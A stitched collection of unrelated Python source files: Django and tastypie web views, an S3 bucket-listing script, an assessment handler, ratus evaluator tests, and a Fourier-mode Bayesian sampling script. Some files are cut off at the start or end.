BUSINESS_UNITS_ENABLED = settings.BUSINESS_UNITS_ENABLED
except:
BUSINESS_UNITS_ENABLED = False
PROJECT_DIR = settings.PROJECT_DIR
def index(request):
#business_units = BusinessUnit.objects.all()
business_units = get_objects_for_user(request.user, 'reports.can_view_businessunit')
hanlde=open(PROJECT_DIR+"/../version", 'r+')
version=hanlde.read()
return {'business_units_enabled': BUSINESS_UNITS_ENABLED,
'business_units': business_units,
'webadmin_version': version}
|
nilq/baby-python
|
python
|
#!/Users/juan/venv-3.8.6/bin/python3.8
# Copyright 2020 Telleztec.com, Juan Tellez, All Rights Reserved
#
import boto3
import datetime
import argparse
# convert bytes to kb, mb, and gb
def to_units(b, unit):
if unit=='b':
return b
elif unit=='k':
return round(b/1000, 2)
elif unit=='m':
return round(b/(1000*1000), 2)
elif unit=='g':
return round(b/(1000*1000*1000), 2)
# list_buckets prints the name of all buckets and the creation time
def list_buckets(s3):
for bucket in s3.buckets.all():
d = bucket.creation_date
print('{:<30s}{:>52s}'.format(
bucket.name, d.isoformat(' ')))
# list_bucket_usage prints all buckets, date of the newst object and the total disk used
def list_bucket_usage(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
d = bucket.creation_date
newest = datetime.datetime(datetime.MINYEAR,1,1,tzinfo=datetime.timezone.utc)
for obj in bucket.objects.all():
totalSizeBytes += obj.size
if newest < obj.last_modified:
newest = obj.last_modified
print('{:<30s} {:s} {:s} {:>16.2f}'.format(bucket.name, d.isoformat(' '), newest.isoformat(' '),
to_units(totalSizeBytes, unit)))
# list_files prints all the objects in a bucket.
def list_files(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
for obj in bucket.objects.all():
d = obj.last_modified
print('{:<30s}{:>52s} {:>10f}'.format(
bucket.name, d.isoformat(' '), to_units(obj.size, unit)))
def main():
parser = argparse.ArgumentParser(prog='s3ls')
parser.add_argument('--region', nargs=1, default='us-east-1',
help='AWS region, e.g. us-east-1')
parser.add_argument('--unit', choices=['b','k','m', 'g'], default='b',
help='Unit to display disk usage in: b, k, m or g')
parser.add_argument('do', choices=['space', 'files', 'buckets'], default='space',
help='Tells the tool what to do: Print space usage, list files or buckets')
namespace = parser.parse_args()
args = vars(namespace)
region = args['region']
unit = args['unit']
session = boto3.session.Session()
s3 = session.resource('s3', region[0])
if args['do'] == 'space':
list_bucket_usage(s3, unit)
elif args['do'] == 'buckets':
list_buckets(s3)
elif args['do'] == 'files':
list_files(s3, unit)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from django.db.models import Count
from tastypie.resources import ModelResource, ALL_WITH_RELATIONS
from tastypie import http, fields
from tastypie.exceptions import ImmediateHttpResponse
from tastypie.bundle import Bundle
import json
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.http import HttpResponse
from .models import Run, RunCaseVersion, RunSuite, Result
from ..mtapi import MTResource, MTApiKeyAuthentication, MTAuthorization
from ..core.api import (ProductVersionResource, ProductResource,
ReportResultsAuthorization, UserResource)
from ..environments.api import EnvironmentResource
from ..environments.models import Environment
from ..library.api import (CaseVersionResource, BaseSelectionResource,
SuiteResource)
from ..library.models import CaseVersion, Suite
from ...view.lists.filters import filter_url
import logging
logger = logging.getLogger(__name__)
class RunSuiteAuthorization(MTAuthorization):
"""Atypically named permission."""
@property
def permission(self):
"""This permission should be checked by is_authorized."""
return "execution.manage_runs"
class RunCaseVersionResource(ModelResource):
"""
RunCaseVersion represents the connection between a run and a caseversion.
It is possible to return a result for each runcaseversion. So the result
will sit as a peer to the caseversion under the runcaseversion.
"""
run = fields.ToOneField(
"moztrap.model.execution.api.RunResource",
"run",
related_name="runcaseversion")
caseversion = fields.ToOneField(CaseVersionResource, "caseversion", full=True)
class Meta:
queryset = RunCaseVersion.objects.all()
list_allowed_methods = ['get']
filtering = {
"run": ALL_WITH_RELATIONS,
"caseversion": ALL_WITH_RELATIONS,
}
fields = ["id", "run"]
class RunResource(ModelResource):
"""
Fetch the test runs for the specified product and version.
It is also possible to create a new testrun, when posted.
"""
productversion = fields.ForeignKey(ProductVersionResource, "productversion")
environments = fields.ToManyField(
EnvironmentResource,
"environments",
full=False,
)
runcaseversions = fields.ToManyField(
RunCaseVersionResource,
"runcaseversions",
)
class Meta:
queryset = Run.objects.all()
list_allowed_methods = ["get", "post"]
fields = [
"id",
"name",
"description",
"status",
"productversion",
"environments",
"runcaseversions",
]
filtering = {
"productversion": ALL_WITH_RELATIONS,
"status": "exact",
}
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
always_return_data = True
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
pv = bundle.obj.productversion
bundle.data["productversion_name"] = pv.version
bundle.data["product_name"] = pv.product.name
return bundle
def dispatch_detail(self, request, **kwargs):
"""For details, we want the full info on environments for the run """
self.fields["environments"].full = True
return super(RunResource, self).dispatch_detail(request, **kwargs)
def dispatch_list(self, request, **kwargs):
"""For list, we don't want the full info on environments """
self.fields["environments"].full = False
return super(RunResource, self).dispatch_list(request, **kwargs)
def create_response(self, request, data,
response_class=HttpResponse, **response_kwargs):
"""On posting a run, return a url to the MozTrap UI for that new run."""
resp = super(RunResource, self).create_response(
request,
data,
response_class=response_class,
**response_kwargs
)
if isinstance(data, Bundle):
# data will be a bundle if we are creating a new Run. And in that
# case we want to add a URI to viewing this new run result in the UI
full_url = filter_url(
"results_runcaseversions",
Run.objects.get(pk=data.data["id"]),
)
new_content = json.loads(resp.content)
new_content["ui_uri"] = full_url
new_content["resource_uri"] = data.data["resource_uri"]
resp.content = json.dumps(new_content)
# need to set the content type to application/json
resp._headers["content-type"] = ("Content-Type", "application/json; charset=utf-8")
return resp
def obj_create(self, bundle, request=None, **kwargs):
"""Set the created_by field for the run to the request's user"""
bundle = super(RunResource, self).obj_create(bundle=bundle, request=request, **kwargs)
bundle.obj.created_by = request.user
bundle.obj.save()
return bundle
def hydrate_runcaseversions(self, bundle):
"""
Handle the runcaseversion creation during a POST of a new Run.
Tastypie handles the creation of the run itself. But we handle the
RunCaseVersions and Results because we have special handler methods for
setting the statuses which we want to keep DRY.
"""
try:
run = bundle.obj
run.save()
# walk results
for data in bundle.data["runcaseversions"]:
status = data.pop("status")
# find caseversion for case
cv = CaseVersion.objects.get(
productversion=run.productversion,
case=data.pop("case"),
)
# create runcaseversion for this run to caseversion
rcv, created = RunCaseVersion.objects.get_or_create(
run=run,
caseversion=cv,
)
data["user"] = bundle.request.user
data["environment"] = Environment.objects.get(
pk=data["environment"])
# create result via methods on runcaseversion
rcv.get_result_method(status)(**data)
bundle.data["runcaseversions"] = []
return bundle
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except ObjectDoesNotExist as e:
raise ValidationError(e)
class ResultResource(ModelResource):
"""
Endpoint for submitting results for a set of runcaseversions.
This endpoint is write only. The submitted result objects should
be formed like this::
{
"objects": [
{
"case": "1",
"environment": "23",
"run_id": "1",
"status": "passed"
},
{
"case": "14",
"comment": "why u no make sense??",
"environment": "23",
"run_id": "1",
"status": "invalidated"
},
{
"bug": "http://www.deathvalleydogs.com",
"case": "326",
"comment": "why u no pass?",
"environment": "23",
"run_id": "1",
"status": "failed",
"stepnumber": 1
}
]
}
"""
class Meta:
queryset = Result.objects.all()
resource_name = "result"
list_allowed_methods = ["patch"]
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
def obj_create(self, bundle, request=None, **kwargs):
"""
Manually create the proper results objects.
This is necessary because we have special handler methods in
RunCaseVersion for setting the statuses which we want to keep DRY.
"""
data = bundle.data.copy()
try:
status = data.pop("status")
case = data.pop("case")
env = Environment.objects.get(pk=data.get("environment"))
run = data.pop("run_id")
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except Environment.DoesNotExist as e:
raise ValidationError(
"Specified environment does not exist: {0}".format(e))
data["environment"] = env
try:
rcv = RunCaseVersion.objects.get(
run__id=run,
caseversion__case__id=case,
environments=env,
)
except RunCaseVersion.DoesNotExist as e:
raise ValidationError(
"RunCaseVersion not found for run: {0}, case: {1}, environment: {2}:\nError {3}".format(
str(run), str(case), str(env), e))
data["user"] = request.user
bundle.obj = rcv.get_result_method(status)(**data)
return bundle
class RunSuiteResource(MTResource):
"""
Create, Read, Update and Delete capabilities for RunSuite.
Filterable by suite and run fields.
"""
run = fields.ForeignKey(RunResource, 'run')
suite = fields.ForeignKey(SuiteResource, 'suite')
class Meta(MTResource.Meta):
queryset = RunSuite.objects.all()
fields = ["suite", "run", "order", "id"]
filtering = {
"suite": ALL_WITH_RELATIONS,
"run": ALL_WITH_RELATIONS
}
authorization = RunSuiteAuthorization()
@property
def model(self):
return RunSuite
@property
def read_create_fields(self):
"""run and suite are read-only"""
return ["suite", "run"]
def hydrate_suite(self, bundle):
"""suite is read-only on PUT
suite.product must match run.productversion.product on CREATE
"""
# CREATE
if bundle.request.META['REQUEST_METHOD'] == 'POST':
suite_id = self._id_from_uri(bundle.data['suite'])
suite = Suite.objects.get(id=suite_id)
run_id = self._id_from_uri(bundle.data['run'])
run = Run.objects.get(id=run_id)
if suite.product.id != run.productversion.product.id:
error_message = str(
"suite's product must match run's product."
)
logger.error(
"\n".join([error_message, "suite prod: %s, run prod: %s"]),
suite.product.id, run.productversion.product.id)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_message))
return bundle
class SuiteSelectionResource(BaseSelectionResource):
"""
Specialty end-point for an AJAX call from the multi-select widget
for selecting suites.
"""
product = fields.ForeignKey(ProductResource, "product")
runs = fields.ToManyField(RunResource, "runs")
created_by = fields.ForeignKey(
UserResource, "created_by", full=True, null=True)
class Meta:
queryset = Suite.objects.all().select_related(
"created_by",
).annotate(case_count=Count("cases"))
list_allowed_methods = ['get']
fields = ["id", "name", "created_by"]
filtering = {
"product": ALL_WITH_RELATIONS,
"runs": ALL_WITH_RELATIONS,
"created_by": ALL_WITH_RELATIONS,
}
ordering = ["runs"]
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
suite = bundle.obj
bundle.data["suite_id"] = unicode(suite.id)
bundle.data["case_count"] = suite.case_count
bundle.data["filter_cases"] = filter_url("manage_cases", suite)
return bundle
|
nilq/baby-python
|
python
|
"""
Copyright 2017 Balwinder Sodhi
Licenced under MIT Licence as available here:
https://opensource.org/licenses/MIT
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Created on Mar 3, 2017
@author: Balwinder Sodhi
"""
from common import *
from entities import *
import logging
class AssessmentHandler(BaseHandler):
def getAssessmentsTakenByUser(self):
ua_list = AssessmentSubmissionDto.query(AssessmentSubmissionDto.submittedBy
== self.get_current_user_key()).fetch()
data = [{"submissionId": x.key.id(), "submittedOn": x.submittedOn,
"draft": x.draft} for x in ua_list]
self.send_json_response(Const.STATUS_OK, data)
def getPortfolio(self):
a = [p.to_dict_with_id("assessId") for p in
AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()]
q = [p.to_dict_with_id("questionId") for p in
QuestionDto.query(QuestionDto.owner == self.get_current_user_key()).fetch()]
t = [p.to_dict_with_id("trailId") for p in
TrailDto.query(TrailDto.owner == self.get_current_user_key()).fetch()]
p = dict()
p['trails'] = t
p['authoredAssessments'] = a
p['questionBank'] = q
p['content'] = [] # TODO Remove
self.send_json_response(Const.STATUS_OK, p)
def getQuestion(self):
q_id = self.request.params["qid"]
q = QuestionDto.get_by_id(long(q_id))
if q:
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def saveQuestion(self):
qf = json.loads(self.request.body)
qid = qf.get("questionId")
if qid:
q = QuestionDto.get_by_id(int(qid))
if q.owner == self.get_current_user_key():
q.populate_from_dict(qf)
q.put()
else:
raise ValueError("Cannot save entity not owned by this user.")
else:
q = QuestionDto(owner=self.get_current_user_key())
q.populate_from_dict(qf)
q.put()
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
def getAssessmentSubmission(self, sub_key=None):
if sub_key:
asub = sub_key.get()
sid = asub.key.id()
else:
sid = self.request.params["id"]
asub = AssessmentSubmissionDto.get_by_id(long(sid))
if asub:
ta = asub.traiAssessment.get()
else:
raise ValueError("Submission record not found.", sid)
# Fetch the assessment
a_dict = self._fetch_assessment(ta.assess.id(), True)
# Mark the selected answers in assessment as per saved submission
if a_dict:
a_dict["submissionId"] = sid
max_points = 0
for q_dict in a_dict["questions"]:
max_points += q_dict["points"]
# One question may have one or more selected responses
res_list = [x for x in asub.responses if x.questionId.id() == q_dict["questionId"]]
for res in res_list:
# Expected only one match here
if q_dict['type'] != 'FTXT':
aopt_dict = [x_dict for x_dict in q_dict['answerOptions']
if x_dict['answer'] == res.answer]
if aopt_dict: aopt_dict[0]["marked"] = True
else:
# Free text answers have a single answerOptions object
q_dict['answerOptions'][0]['response'] = res.answer
# Include the score
a_dict["score"] = str(asub.score)
a_dict["maxPoints"] = max_points
a_dict["draft"] = asub.draft
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Record not found!")
def getAssessmentForTaking(self):
if "id" not in self.request.params:
self.send_json_response(Const.STATUS_ERROR, "Missing required params.")
return
a_id = self.request.params["id"]
# First check for an existing in-progress submission
ta = TrailAssessmentDto.query(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(a_id))).fetch(keys_only=True)
if ta:
sub_keys = AssessmentSubmissionDto.query(
AssessmentSubmissionDto.traiAssessment == ta[0],
AssessmentSubmissionDto.submittedBy == self.get_current_user_key()
).fetch(keys_only=True)
# Found an existing submission
if sub_keys:
logging.info(">>>>>> Found existing submission. ID: %s", sub_keys)
# self.redirect("/#/EditSubmission/%d" % sub_keys[0].id())
self.getAssessmentSubmission(sub_keys[0])
else:
logging.info(">>>>>> Did not find any existing submission. ID: %s", ta)
self.getAssessment(for_taking=True)
def saveAssessmentResponse(self):
ar_dict = self.load_json_request()
# Fix the key properties
for r in ar_dict["responses"]:
r["questionId"] = ndb.Key(QuestionDto, long(r["questionId"]))
if "submissionId" in ar_dict:
sub = AssessmentSubmissionDto.get_by_id(long(ar_dict["submissionId"]))
else:
aid = ar_dict["assessId"]
ta_list = TrailAssessmentDto.query().\
filter(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(aid))
).fetch(keys_only=True)
if not ta_list:
raise ValueError("Trail assessment record not found for assessment ID %s" % aid)
sub = AssessmentSubmissionDto(traiAssessment = ta_list[0])
sub.populate_from_dict(ar_dict)
sub.submittedBy = self.get_current_user_key()
sub.put()
self.send_json_response(Const.STATUS_OK, sub.to_dict_with_id("submissionId"))
def getAssessmentResult(self):
sid = self.request.params["id"]
sub = AssessmentSubmissionDto.get_by_id(long(sid))
if sub:
# if not sub.draft:
# self.send_json_response(Const.STATUS_ERROR, "Already submitted!")
# return
sub.draft = False
# Calculate score
ta = sub.traiAssessment.get()
res_list = sub.responses
asmt = ta.assess.get()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == ta.assess).fetch()
# Reset the score
sub.score = 0
for aq in aq_list:
q = aq.assessQtn.get()
# Expected correct answers list
ca_list = [ao.answer for ao in q.answerOptions if ao.correct]
# Submitted answers list
qr_list = [r.answer for r in res_list if r.questionId == aq.assessQtn]
if ca_list == qr_list:
sub.score += aq.points
else:
sub.score += asmt.pointsForWrongAns
# Persist in datastore
sub_key = sub.put()
self.getAssessmentSubmission(sub_key=sub_key)
else:
self.send_json_response(Const.STATUS_ERROR, "Data not found.")
def getAssessment(self, for_taking=False):
aid = self.request.params["id"]
a_dict = self._fetch_assessment(aid, for_taking)
if a_dict:
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def _fetch_assessment(self, aid, for_taking):
a = AssessmentDto.get_by_id(long(aid))
if a:
a_dict = a.to_dict_with_id("assessId")
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a.key).fetch()
if aq_list:
q_pts = {}
keys = []
for aq in aq_list:
q_pts[aq.assessQtn.id()] = aq.points
keys.append(ndb.Key(QuestionDto, aq.assessQtn.id()))
q_list = ndb.get_multi(keys)
qdict_list = [x.to_dict_with_id("questionId") for x in q_list]
for q in qdict_list:
q["points"] = q_pts[q["questionId"]]
a_dict["questions"] = qdict_list
# Clear the correct flags on answers
if for_taking:
for qd in a_dict["questions"]:
for ao in qd['answerOptions']:
ao['correct'] = None
if qd['type'] == 'FTXT':
ao['answer'] = None
return a_dict
def lookupAssessments(self):
# TODO: Minimize information to be sent
qry = self.request.params["q"]
a_list = AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()
f = [a.to_dict_with_id("assessId") for a in a_list if qry.lower() in a.title.lower()]
self.send_json_response(Const.STATUS_OK, f)
def saveAssessment(self):
asmt = self.load_json_request()
if "assessId" in asmt:
a = AssessmentDto.get_by_id(int(asmt["assessId"]))
logging.debug("Loaded assessment from DB.")
else:
a = AssessmentDto()
logging.debug("Creating new assessment.")
a.populate_from_dict(asmt)
a.owner = self.get_current_user_key()
a_key = a.put()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a_key).fetch()
if aq_list:
ndb.delete_multi([x.key for x in aq_list])
logging.debug("Cleared old AQs.")
for aq in asmt["questions"]:
q = AssessmentQuestionDto()
q.assessQtn = ndb.Key(QuestionDto, aq["questionId"])
q.assess = a_key
q.points = aq["points"]
q.put()
a_dict = a.to_dict_with_id("assessId")
a_dict["questions"] = asmt["questions"]
self.send_json_response(Const.STATUS_OK, a_dict)
|
nilq/baby-python
|
python
|
#
# Sample: Gamut clamping
#
from lcms import *
Lab = cmsCIELab(80, -200, 50)
print "Original", Lab
#
# Desaturates color to bring it into gamut.
# The gamut boundaries are specified as:
# -120 <= a <= 120
# -130 <= b <= 130
cmsClampLab(Lab, 120, -120, 130, -130)
print "Constrained", Lab
|
nilq/baby-python
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path("numbers", views.NumberListView.as_view(), name="number_list_view"),
path("numbers/<int:pk>/", views.NumberView.as_view(), name="number_view"),
path("numbers/add_number/", views.NumberEditView.as_view(), name="add_number"),
path('numbers/import_numbers/', views.NumberBulkImportView.as_view(), name='import_numbers'),
path("numbers/<int:pk>/edit/", views.NumberEditView.as_view(), name="number_edit"),
path("numbers/number_bulk_edit", views.NumberBulkEditView.as_view(), name="number_bulk_edit"),
path("numbers/<int:pk>/delete/", views.NumberDeleteView.as_view(), name="number_delete"),
path("numbers/number_bulk_delete", views.NumberBulkDeleteView.as_view(), name="number_bulk_delete"),
path("trunks", views.TrunkListView.as_view(), name="trunk_list_view"),
path("trunks/<int:pk>/", views.TrunkView.as_view(), name="trunk_view"),
path("trunks/add_trunk/", views.TrunkEditView.as_view(), name="add_trunk"),
path('trunks/import_trunks/', views.TrunkBulkImportView.as_view(), name='import_trunks'),
path("trunks/<int:pk>/edit/", views.TrunkEditView.as_view(), name="trunk_edit"),
path("trunks/trunk_bulk_edit", views.TrunkBulkEditView.as_view(), name="trunk_bulk_edit"),
path("trunks/<int:pk>/delete/", views.TrunkDeleteView.as_view(), name="trunk_delete"),
path("trunks/trunk_bulk_delete", views.TrunkBulkDeleteView.as_view(), name="trunk_bulk_delete"),
path("UCClusters", views.UCClusterListView.as_view(), name="uccluster_list_view"),
path("UCClusters/<int:pk>/", views.UCClusterView.as_view(), name="uccluster_view"),
path("UCClusters/add_uccluster/", views.UCClusterEditView.as_view(), name="add_uccluster"),
path('UCClusters/import_ucclusters/', views.UCClusterBulkImportView.as_view(), name='import_ucclusters'),
path("UCClusters/<int:pk>/edit/", views.UCClusterEditView.as_view(), name="uccluster_edit"),
path("UCClusters/uccluster_bulk_edit", views.UCClusterBulkEditView.as_view(), name="uccluster_bulk_edit"),
path("UCClusters/<int:pk>/delete/", views.UCClusterDeleteView.as_view(), name="uccluster_delete"),
path("UCClusters/uccluster_bulk_delete", views.UCClusterBulkDeleteView.as_view(), name="uccluster_bulk_delete"),
path("devicepools", views.DevicePoolListView.as_view(), name="devicepool_list_view"),
path("devicepools/<int:pk>/", views.DevicePoolView.as_view(), name="devicepool_view"),
path("devicepools/add_devicepool/", views.DevicePoolEditView.as_view(), name="add_devicepool"),
path('devicepools/import_devicepools/', views.DevicePoolBulkImportView.as_view(), name='import_devicepools'),
path("devicepools/<int:pk>/edit/", views.DevicePoolEditView.as_view(), name="devicepool_edit"),
path("devicepools/devicepool_bulk_edit", views.DevicePoolBulkEditView.as_view(), name="devicepool_bulk_edit"),
path("devicepools/<int:pk>/delete/", views.DevicePoolDeleteView.as_view(), name="devicepool_delete"),
path("devicepools/devicepool_bulk_delete", views.DevicePoolBulkDeleteView.as_view(), name="devicepool_bulk_delete"),
]
|
nilq/baby-python
|
python
|
import re
import pytest
from ratus import Evaluator, __version__
from ratus.execer import Executor, ExecutorError
from ratus.parse import (
BinaryOp,
BinaryOpType,
Float,
Function,
Integer,
Parser,
ParserError,
String,
UnaryOp,
UnaryOpType,
)
from ratus.token import Token, Tokeniser, TokenLiteral, TokenType
def test_version():
assert __version__ == "0.0.1"
@pytest.mark.parametrize(
("source", "expected", "injected_functions"),
(
pytest.param("1 + 1", 2, None, id="addition"),
pytest.param("1 - 1", 0, None, id="subtraction"),
pytest.param("1 + 3 * 2", 7, None, id="precedence"),
pytest.param("2.0", 2.0, None, id="float_literal"),
pytest.param('"test"', "test", None, id="string_literal"),
pytest.param("if(1 > 2, 10, 5)", 5, None, id="false_conditional"),
pytest.param("if(1<2, 10, 5)", 10, None, id="true_conditional"),
pytest.param("if(if(1<2, 0, 1), 10, 5)", 5, None, id="nested_conditional"),
pytest.param("2 + 3 * 2", 8, None, id="bodmas"),
pytest.param("3 * 2 + 2", 8, None, id="computation_ordering"),
pytest.param("1 > 2", False, None, id="greater_than"),
pytest.param("1 = 1", True, None, id="equals"),
pytest.param("1 != 2", True, None, id="not_equals"),
pytest.param(
"lookup(12345, 'PG')",
10,
{"lookup": lambda x, y: 10},
id="injected_function",
),
pytest.param(
"if(lookup(12345, 'PG') = 10, 5, 4)",
5,
{"lookup": lambda x, y: 10},
id="injected_function_in_conditional",
),
pytest.param(
"add(1, 2)",
3,
{"add": lambda x, y: x + y},
id="function_call_in_computation",
),
),
)
def test_eval(source, expected, injected_functions):
evaluator = Evaluator(injected_functions)
assert evaluator.evaluate(source) == expected
@pytest.mark.parametrize(
("source", "injected_functions", "error_msg"),
(("test(1, 2)", None, "Function 'test' is not defined"),),
)
def test_eval_error(source, injected_functions, error_msg):
evaluator = Evaluator(injected_functions)
with pytest.raises(ExecutorError, match=error_msg):
evaluator.evaluate(source)
|
nilq/baby-python
|
python
|
from hilbert import main
main()
|
nilq/baby-python
|
python
|
from rest_framework import serializers
from attendance.models import Attendance, AttendanceBlock, Session
class SessionSerializer(serializers.ModelSerializer):
subject = serializers.SerializerMethodField()
class Meta:
model = Session
fields = [
"subject",
"start",
"end",
"did_attend",
]
def get_subject(self, obj):
return obj.subject.name
class AttendanceSerializer(serializers.ModelSerializer):
sessions = SessionSerializer(many=True)
class Meta:
model = Attendance
fields = [
"date",
"present",
"absent",
"total",
"sessions",
]
def get_subject(self, obj):
return obj.subject.name
class AttendanceBlockSerializer(serializers.ModelSerializer):
attendance = AttendanceSerializer(many=True)
semester = serializers.SerializerMethodField()
class Meta:
model = AttendanceBlock
fields = [
"semester",
"link",
"total",
"present",
"absent",
"percent",
"updated_at",
"attendance",
]
def get_semester(self, obj):
return obj.semester.semester
|
nilq/baby-python
|
python
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as opt
import scipy.stats as st
from math import exp, copysign, log, sqrt, pi
import sys
sys.path.append('..')
from rto_l1 import *
# ground truth parameter
thetatruth = np.array([0.5, 1.0, 0, 0.1, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
N_modes = int((len(thetatruth)-1)/2)
# weight functions to penalize high Fourier modes
#weights_cos = np.ones((N_modes,)) # no penalization
weights_cos = 1/np.arange(1, N_modes+1)
#weights_sin = np.ones((N_modes,)) # no penalization
weights_sin = 1/np.arange(1, N_modes+1)
# forward function and Jacobian
def f_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = theta[0]
for k in range(N_modes):
temp += theta[k+1] * weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * weights_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:,k+1] = weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = weights_sin[k]*np.sin((k+1)*xs)
return temp
# observation positions
xObs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(2, 3, (20,))), axis=0)
N = len(xObs)
# forward function for fixed observation positions
def f(theta):
return f_fnc(theta, xObs)
def Jf(theta):
return Jf_fnc(theta, xObs)
# observational noise standard deviation
sigma = 0.05
# generate data
y = f_fnc(thetatruth, xObs) + np.random.normal(0, sigma, (len(xObs),))
# Laplace prior scale gamma (std = sqrt(2)*gamma)
gamma = 0.1
lam = 1/gamma
def cost(theta, y_aug):
r = resf(theta, y_aug)
return 0.5*np.dot(r.T, r)
# starting point for optimization
u0 = np.random.normal(0, gamma, thetatruth.shape)
# RTO sampling
N_samples = 100
lambdas = lam*np.ones((2*N_modes+1,))
res = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
# extract data
samples_plain = res["samples_plain"]
samples_corrected = res["samples_corrected"]
thetaMAP = res["thetaMAP"]
#plot results
xx = np.arange(0, pi, 0.01)
yy = f_fnc(thetatruth, xx)
plt.figure(1); plt.clf();plt.ion()
for n in range(17):
plt.plot(xx, f_fnc(samples_corrected[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k')
plt.plot(xx, f_fnc(thetatruth, xx), 'g')
plt.plot(xx, yy, 'g')
plt.plot(xObs, y, 'r.', markersize=10)
for n, pos in enumerate(xObs):
plt.plot(np.array([pos, pos]), np.array([y[n]-2*sigma, y[n]+2*sigma]), 'r', linewidth=2)
plt.figure(2);plt.clf()
for n in range(17):
plt.plot(samples_corrected[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP.flatten(), '.k-')
plt.plot(thetatruth.flatten(), '.g-')
plt.show()
"""np.random.seed(1992)
xs_obs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(4, 2*pi, (30,))), axis=0)
N = len(xs_obs)
sigma = 0.2
thetaTruth = np.array([0.5, 1.0, 0, 0.1, 0, 0, 0, 0, -0.3, 0, 0, 0, 0, 0, 0])
N_modes = int((len(thetaTruth)-1)/2)
coeffs_cos = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
coeffs_sin = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
def f_fnc(theta, xs):
temp = theta[0]
N_modes = int((len(theta)-1)/2)
for k in range(N_modes):
temp += theta[k+1] * coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * coeffs_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:, k+1] = coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = coeffs_sin[k]*np.sin((k+1)*xs)
return temp
# variants with fixed x in observation points
f = lambda theta: f_fnc(theta, xs_obs)
Jf = lambda theta: Jf_fnc(theta, xs_obs)
xx = np.arange(0, 2*pi, 0.01)
yy = f_fnc(thetaTruth, xx)
y = f_fnc(thetaTruth, xs_obs) + np.random.normal(0, sigma, (len(xs_obs),))
lam = 3
def norm1(theta, lam_val):
return lam_val*np.sum(np.abs(theta))
def FncL1(theta, y, lam_val):
return Misfit(theta, y) + norm1(theta, lam_val)
N_iter = 300
tau = 0.002
val = np.zeros((N_iter,))
thetaOpt = np.zeros((2*N_modes+1,))
# find MAP estimator
misfit = lambda theta: f(theta)-y
def Phi_fnc(theta):
m = misfit(theta)
return 1/(2*sigma**2)*np.dot(m.T, m)
def DPhi_fnc(theta):
return np.dot(Jf(theta).T, misfit(theta))/sigma**2
I_fnc = lambda theta: Phi_fnc(theta) + norm1(theta, lam)
res = FISTA(thetaOpt, I_fnc, Phi_fnc, DPhi_fnc, 2*sigma**2*lam, alpha0=10, eta=0.5, N_iter=500, c=1.0, showDetails=True)
thetaOpt = np.copy(res["sol"])
plt.figure(2)
plt.title("FISTA")
plt.plot(res["Is"])
lambdas = lam*np.ones((2*N_modes+1,))
u0 = np.zeros((2*N_modes+1,))
N_samples = 250
res_rto = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
